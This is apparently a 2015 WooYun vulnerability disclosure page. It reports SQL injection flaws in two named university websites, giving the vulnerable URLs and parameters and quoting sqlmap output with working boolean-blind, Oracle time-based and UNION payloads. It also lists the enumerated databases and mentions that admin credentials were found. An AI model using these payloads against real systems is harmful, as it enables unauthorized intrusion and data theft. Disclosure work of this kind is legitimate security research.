当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102654

漏洞标题:中央财经大学两处SQL注射,挺多数据的

相关厂商:中央财经大学

漏洞作者: 叫我阿米

提交时间:2015-03-24 11:57

修复时间:2015-03-29 11:58

公开时间:2015-03-29 11:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT,挺多表,跑着好慢就没跑了

详细说明:

中央财经大学就业网:http://scc.cufe.edu.cn/jyw_zc/detail.jsp?seq=2310


sqlmap:---
Place: GET
Parameter: seq
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: seq=2310' AND 2927=2927 AND 'cLEy'='cLEy
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: seq=2310' AND 9752=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(114)||CHR(66)||CHR(109),5) AND 'tVAQ'='tVAQ
---
[
web application technology: JSP, Apache 2.0.59
back-end DBMS: Oracle


数据库:available databases [19]:
[*] BKZSW
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] JYZXGL
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XSCWZ
[*] XSXT


中央财经大学商学院:http://bsen.cufe.edu.cn/news.aspx?id=12&type=2
 注入参数id=12


sqlmap---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12 AND 2268=2268&type=2
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: id=-1666 UNION ALL SELECT 42,CHAR(113)+CHAR(114)+CHAR(115)+CHAR(114)+CHAR(113)+CHAR(104)+CHAR(107)+CHAR(89)+CHAR(120)+CHAR(86)+CHAR(71)+CHAR(120)+CHAR(107)+CHAR(81)+CHAR(87)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(114)+CHAR(113),42,42,42,42,42,42,42-- &type=2
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


数据库:available databases [7]:                                                       
[*] db_cufeIT
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


这个账号密码后台都找到了,16位MD5加密没解出来,就懒得等结果了,不进后台了

漏洞证明:

已证明!

修复方案:

你们来吧

版权声明:转载请注明来源 叫我阿米@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-29 11:58

厂商回复:

最新状态:

暂无

漏洞评价:

评论